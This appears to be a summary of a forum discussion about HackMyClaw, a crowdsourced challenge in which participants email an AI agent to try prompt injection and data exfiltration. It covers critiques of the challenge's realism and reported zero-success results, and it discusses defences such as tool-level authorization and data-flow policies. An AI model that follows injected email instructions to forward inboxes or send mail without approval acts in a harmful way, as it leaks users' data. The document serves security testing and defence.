2026-02-17

HackMyClaw

Challenge Setup & “Not Allowed to Reply” Confusion

Initial wording (“not allowed to reply without human approval”) confused people: is it a hard technical restriction or just a prompt?
Clarification: the agent can send email; it’s merely instructed not to without human approval—exactly the kind of soft guardrail the challenge tries to bypass.
Some argue the wording should be more explicit; others say ambiguity is part of the game.

Motivations, Incentives & Data Concerns

Many see this as a crowdsourced penetration test and cheap way to collect prompt-injection attempts; $100 is seen as a very good price for such a dataset.
Others suspect list-building or social-engineering reconnaissance; some push back, saying one payment to one winner is low-risk.
Several participants use fake/throwaway emails; the creator claims emails won’t be reused and might later publish anonymized injection attempts.

Experiment Design & Realism

Critiques:
- Email-only, no immediate reply, and possible batch processing make this unlike real, interactive agents.
- The agent sees a stream of obvious phishing, making subtle attacks easier to detect (“paranoid” behavior seen in the public log).
- Stateless vs stateful context handling is unclear; realistic deployments vary.
Supporters argue even a biased CTF still surfaces weaknesses and builds valuable corpora.

Prompt Injection Difficulty & Model Behavior

Reported stats: ~400+ emails, zero successful exfiltrations so far with Claude Opus 4.6.
Some say this shows attacks are harder than widely assumed; others say it only shows this very narrow scenario is hard.
Observations that the model now classifies nearly everything as “hackmyclaw attack” suggest “alerted” behavior not representative of typical use.

Broader Security Discussion (Agents & OpenClaw)

Many emphasize that prompt injection is structural: untrusted content is deliberately fed into the control loop.
Discussion of the “lethal trifecta” (tools + credentials + untrusted input) and need for:
- Capability-based security and tool-level authorization, not just “don’t do X” prompts.
- Data-flow policies (e.g., preventing “forward inbox to attacker”).
Debate over analogies: locks, SSH on random ports, spam filtering, and human phishing training.
Some use OpenClaw only with read-only access and single outbound channel to themselves; others warn even limited URLs/DNS can leak information.

Related topics